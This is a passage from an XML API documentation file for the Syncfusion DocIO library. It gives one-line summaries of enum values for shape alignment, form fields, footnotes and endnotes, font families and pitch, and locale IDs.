        </member>
        <member name="F:Syncfusion.DocIO.ShapeHorizontalAlignment.Left">
            <summary>
            The object is aligned to the left of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeHorizontalAlignment.Center">
            <summary>
            The object is centered to the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeHorizontalAlignment.Right">
            <summary>
            The object is aligned to the right of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeHorizontalAlignment.Inside">
            <summary>
            The object is aligned to the inside of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeHorizontalAlignment.Outside">
            <summary>
            The object is aligned to the outside of the reference origin.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ShapeVerticalAlignment">
            <summary>
            Specifies vertical alignment of a shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeVerticalAlignment.Bottom">
            <summary>
            The object is aligned to the bottom of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeVerticalAlignment.Center">
            <summary>
            The object is centered relative to the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeVerticalAlignment.Inline">
            <summary>
            The object is aligned to the in line of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeVerticalAlignment.Inside">
            <summary>
            The object is aligned to the inside of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeVerticalAlignment.None">
            <summary>
            The object is explicitly positioned using position properties.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeVerticalAlignment.Outside">
            <summary>
            The object is aligned to the outside of the reference origin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ShapeVerticalAlignment.Top">
            <summary>
            The object is aligned to the top of the reference origin.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.TextFormFieldType">
            <summary>
            Specifies the text form field type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextFormFieldType.RegularText">
            <summary>
            Regular text field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextFormFieldType.NumberText">
            <summary>
            Number text field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextFormFieldType.DateText">
            <summary>
            Date text field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextFormFieldType.CurrentDateText">
            <summary>
            Current date text field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextFormFieldType.CurrentTimeText">
            <summary>
            Current time text field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextFormFieldType.Calculation">
            <summary>
            Calculation text field.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FootnotePosition">
            <summary>
            Specifies the position of footnotes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootnotePosition.PrintAsEndnotes">
            <summary>
            Footnotes are output at the bottom of each end notes. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootnotePosition.PrintAtBottomOfPage">
            <summary>
            At bottom of current page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootnotePosition.PrintImmediatelyBeneathText">
            <summary>
            Beneath current text on each page. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FootnoteRestartIndex">
            <summary>
            Specifies the restart index of footnotes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootnoteRestartIndex.DoNotRestart">
            <summary>
            Numbering continuous throughout the document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootnoteRestartIndex.RestartForEachSection">
            <summary>
            Numbering restarts at each section.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootnoteRestartIndex.RestartForEachPage">
            <summary>
            Numbering restarts at each page.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.EndnoteRestartIndex">
            <summary>
            Specifies the restart index of the endnotes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.EndnoteRestartIndex.DoNotRestart">
            <summary>
            Numbering continuous throughout the document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.EndnoteRestartIndex.RestartForEachSection">
            <summary>
            Numbering restarts at each section.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.EndnotePosition">
            <summary>
            Specifies the position of the endnotes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.EndnotePosition.DisplayEndOfSection">
            <summary>
            Display at the end of each section.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.EndnotePosition.DisplayEndOfDocument">
            <summary>
            Display at the end of the document.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FootEndNoteNumberFormat">
            <summary>
            Specifies the number format of endnotes and footnotes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootEndNoteNumberFormat.Arabic">
            <summary>
            Arabic format (1, 2, 3, ...).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootEndNoteNumberFormat.UpperCaseRoman">
            <summary>
            Upper case roman format (I, II, III, ...).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootEndNoteNumberFormat.LowerCaseRoman">
            <summary>
            Lower case roman format (i, ii, iii, ...).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootEndNoteNumberFormat.UpperCaseLetter">
            <summary>
            Upper case letters format (A, B, C, ...) .
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootEndNoteNumberFormat.LowerCaseLetter">
            <summary>
            Lower case letters format (a, b, c, ...) .
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FootnoteType">
            <summary>
            Specifies the type of the footnote.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootnoteType.Footnote">
            <summary>
            Specifies object is a footnote. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FootnoteType.Endnote">
            <summary>
            Specifies object is a endnote. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FontFamilyType">
            <summary>
            Specifies the Type of the FontFamily.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FontFamilyType.Auto">
            <summary>
            Font family is unspecified for this font. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FontFamilyType.Roman">
            <summary>
            Roman (Serif).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FontFamilyType.Swiss">
            <summary>
            Swiss (Sans-serif).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FontFamilyType.Modern">
            <summary>
            Swiss (Sans-serif).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FontFamilyType.Script">
            <summary>
            Script (Cursive).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FontFamilyType.Decorative">
            <summary>
            Decorative (Fantasy).
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FontPitchType">
            <summary>
            Specifies the type of the font pitch request.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FontPitchType.Default">
            <summary>
            Default pitch.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FontPitchType.Fixed">
            <summary>
            Fixed pitch.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FontPitchType.Variable">
            <summary>
            Variable pitch. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.LocaleIDs">
            <summary>
            Specifies the local ID's.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.af_ZA">
            <summary>
            African.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sq_AL">
            <summary>
            Albanian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.am_ET">
            <summary>
            Amharic.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.gsw_FR">
            <summary>
            Alsatian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_DZ">
            <summary>
            Arabic Algerian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_BH">
            <summary>
            Arabic Bahraini.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_EG">
            <summary>
            Arabic Egyptian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_IQ">
            <summary>
            Arabic Iraqi.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_JO">
            <summary>
            Arabic Jordanian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_KW">
            <summary>
            Arabic Kuwaiti.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_LB">
            <summary>
            Arabic Lebanese.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_LY">
            <summary>
            Arabic Libyan.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_MA">
            <summary>
            Arabic Moroccan.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_OM">
            <summary>
            Arabic Omani.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_QA">
            <summary>
            Arabic Qatari.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_SA">
            <summary>
            Arabic Saudi.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_SY">
            <summary>
            Arabic Syrian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_TN">
            <summary>
            Arabic Tunisian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_AE">
            <summary>
            Arabic United Arab Emirates.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ar_YE">
            <summary>
            Arabic Yemeni.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.hy_AM">
            <summary>
            Armenian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.as_IN">
            <summary>
            Assamese.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.az_Cyrl_AZ">
            <summary>
            Azeri Cyrillic.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.az_Latn_AZ">
            <summary>
            Azeri Latin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ba_RU">
            <summary>
            Bashkir.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.eu_ES">
            <summary>
            Basque.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.be_BY">
            <summary>
            Belarusian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.bn_BD">
            <summary>
            Bengali (Bangladesh).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.bn_IN">
            <summary>
            Bengali (India).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.bs_Cyrl_BA">
            <summary>
            Bosnian (Cyrillic, Bosnia and Herzegovina).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.bs_Latn_BA">
            <summary>
            Bosnian (Bosnia/Herzegovina).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.bg_BG">
            <summary>
            Bulgarian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.br_FR">
            <summary>
            Breton.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.my_MM">
            <summary>
            Burmese.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ca_ES">
            <summary>
            Catalan.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.chr_US">
            <summary>
            Cherokee - United States.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.zh_HK">
            <summary>
            Chinese - Hong Kong SAR.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.zh_MO">
            <summary>
            Chinese - Macao SAR.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.zh_CN">
            <summary>
            Chinese - People's Republic of China.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.zh_SG">
            <summary>
            Chinese - Singapore.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.zh_TW">
            <summary>
            Chinese - Taiwan.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.co_FR">
            <summary>
            Corsican.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.hr_BA">
            <summary>
            Croatian (Bosnia/Herzegovina).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.hr_HR">
            <summary>
            Croatian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.cs_CZ">
            <summary>
            Czech.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.da_DK">
            <summary>
            Danish.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.prs_AF">
            <summary>
            Dari.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.dv_MV">
            <summary>
            Divehi.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.nl_BE">
            <summary>
            Dutch - Belgium.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.nl_NL">
            <summary>
            Dutch - Netherlands.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.bin_NG">
            <summary>
            Edo.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.et_EE">
            <summary>
            Estonian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_AU">
            <summary>
            English - Australia.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_BZ">
            <summary>
            English - Belize.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_CA">
            <summary>
            English - Canada.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_029">
            <summary>
            English - Caribbean.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_HK">
            <summary>
            English - Hong Kong SAR.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_IN">
            <summary>
            English - India.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_ID">
            <summary>
            English - Indonesia.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_IE">
            <summary>
            English - Ireland.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_JM">
            <summary>
            English - Jamaica.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_MY">
            <summary>
            English - Malaysia.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_NZ">
            <summary>
            English - New Zealand.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_PH">
            <summary>
            English - Philippines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_SG">
            <summary>
            English - Singapore.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_ZA">
            <summary>
            English - South Africa.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_TT">
            <summary>
            English - Trinidad.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_GB">
            <summary>
            English - United Kingdom.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_US">
            <summary>
            English - United States.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.en_ZW">
            <summary>
            English - Zimbabwe.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fo_FO">
            <summary>
            Faroese.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fil_PH">
            <summary>
            Filipino.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fi_FI">
            <summary>
            Finnish.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_BE">
            <summary>
            French - Belgium.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_CM">
            <summary>
            French - Cameroon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_CA">
            <summary>
            French - Canada.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_CD">
            <summary>
            French - Democratic Rep. of Congo.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_CI">
            <summary>
            French - Cote d'Ivoire.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_FR">
            <summary>
            French - France.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_HT">
            <summary>
            French - Haiti.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_LU">
            <summary>
            French - Luxembourg.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_ML">
            <summary>
            French - Mali.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_MC">
            <summary>
            French - Monaco.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_MA">
            <summary>
            French - Morocco.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_RE">
            <summary>
            French - Reunion.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_SN">
            <summary>
            French - Senegal.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_CH">
            <summary>
            French - Switzerland.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fr_fr_WINDIES">
            <summary>
            French - West Indies.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fy_NL">
            <summary>
            Frisian - Netherlands.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ff_NG">
            <summary>
            Fulfulde - Nigeria.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.gd_GB">
            <summary>
            Scottish Gaelic.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.gl_ES">
            <summary>
            Galician.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ka_GE">
            <summary>
            Georgian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.de_AT">
            <summary>
            German - Austria.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.de_DE">
            <summary>
            German - Germany.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.de_LI">
            <summary>
            German - Liechtenstein.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.de_LU">
            <summary>
            German - Luxembourg.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.de_CH">
            <summary>
            German - Switzerland.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.el_GR">
            <summary>
            Greek.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.gn_PY">
            <summary>
            Guarani - Paraguay.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.gu_IN">
            <summary>
            Gujarati.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.kl_GL">
            <summary>
            Greenlandic.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ha_Latn_NG">
            <summary>
            Hausa - Nigeria.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.haw_US">
            <summary>
            Hawaiian - United States.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.he_IL">
            <summary>
            Hebrew.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.hi_IN">
            <summary>
            Hindi.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.hu_HU">
            <summary>
            Hungarian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ibb_NG">
            <summary>
            Ibibio - Nigeria.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.is_IS">
            <summary>
            Icelandic.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ig_NG">
            <summary>
            Igbo - Nigeria.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.id_ID">
            <summary>
            Indonesian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.iu_Latn_CA">
            <summary>
            Inuktitut (Latin, Canada).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.iu_Cans_CA">
            <summary>
            Inuktitut.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.it_IT">
            <summary>
            Italian - Italy.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.it_CH">
            <summary>
            Italian - Switzerland.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ga_IE">
            <summary>
            Irish.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.xh_ZA">
            <summary>
            Xhosa.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.zu_ZA">
            <summary>
            Zulu.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.kn_IN">
            <summary>
            Kannada (India).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.kr_NG">
            <summary>
            Kanuri - Nigeria.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ks_Deva">
            <summary>
            Kashmiri.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ks_Arab">
            <summary>
            Kashmiri (Arabic).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.kk_KZ">
            <summary>
            Kazakh.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.km_KH">
            <summary>
            Khmer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.kok_IN">
            <summary>
            Konkani.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ko_KR">
            <summary>
            Korean.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ky_KG">
            <summary>
            Kyrgyz (Cyrillic).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.qut_GT">
            <summary>
            K'iche.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.rw_RW">
            <summary>
            Kinyarwanda.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.lo_LA">
            <summary>
            Lao.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.la_Latn">
            <summary>
            Latin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.lv_LV">
            <summary>
            Latvian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.lt_LT">
            <summary>
            Lithuanian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.dsb_DE">
            <summary>
            Lower Sorbian (Germany).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.lb_LU">
            <summary>
            Luxembourgish.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.mk_MK">
            <summary>
            FYRO Macedonian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ms_BN">
            <summary>
            Malay - Brunei Darussalam.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ms_MY">
            <summary>
            Malay - Malaysia.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ml_IN">
            <summary>
            Malayalam.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.mt_MT">
            <summary>
            Maltese.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.mni_IN">
            <summary>
            Manipuri.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.mi_NZ">
            <summary>
            Maori - New Zealand.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.mr_IN">
            <summary>
            Marathi.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.arn_CL">
            <summary>
            Mapudungun.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.mn_MN">
            <summary>
            Mongolian (Cyrillic).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.mn_Mong_CN">
            <summary>
            Mongolian (Mongolian).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ne_NP">
            <summary>
            Nepali.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ne_IN">
            <summary>
            Nepali - India.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.nb_NO">
            <summary>
            Norwegian (Bokm�l).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.nn_NO">
            <summary>
            Norwegian (Nynorsk).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.oc_FR">
            <summary>
            Occitan.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.or_IN">
            <summary>
            Oriya.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.om_Ethi_ET">
            <summary>
            Oromo.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.pap_AN">
            <summary>
            Papiamentu.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ps_AF">
            <summary>
            Pashto.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.fa_IR">
            <summary>
            Farsi.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.pl_PL">
            <summary>
            Polish.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.pt_BR">
            <summary>
            Portuguese - Brazil.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.pt_PT">
            <summary>
            Portuguese - Portugal.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.pa_IN">
            <summary>
            Punjabi (India).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.pa_PK">
            <summary>
            Punjabi (Pakistan).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.quz_BO">
            <summary>
            Quecha - Bolivia.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.guz_EC">
            <summary>
            Quecha - Ecuador.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.guz_PE">
            <summary>
            Quecha - Peru.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ro_RO">
            <summary>
            Romanian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ro_MO">
            <summary>
            Romanian - Moldava.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.rm_CH">
            <summary>
            Rhaeto-Romanic.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ru_RU">
            <summary>
            Russian.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.ru_MO">
            <summary>
            Russian - Moldava.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.smn_FI">
            <summary>
            Sami, Inari (Finland).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.smj_NO">
            <summary>
            Sami, Lule (Norway).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.smj_SE">
            <summary>
            Sami, Lule (Sweden).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.se_FI">
            <summary>
            Sami, Northern (Finland).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.se_NO">
            <summary>
            Sami (Lappish).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.se_SE">
            <summary>
            Sami, Northern (Sweden).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sms_FI">
            <summary>
            Sami, Skolt (Finland).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sma_NO">
            <summary>
            Sami, Southern (Norway).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sma_SE">
            <summary>
            Sami, Southern (Sweden).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sa_IN">
            <summary>
            Sanskrit - India.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sr_Cyrl_BA">
            <summary>
            Serbian (Cyrillic, Bosnia and Herzegovina).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sr_Cyrl_CS">
            <summary>
            Serbian (Cyrillic).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sr_Latn_BA">
            <summary>
            Serbian (Latin, Bosnia and Herzegovina).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.LocaleIDs.sr_Latn_CS">
            <summary>
            Serbian (Latin, Serbia and Montenegro (Former)).
            </summary>
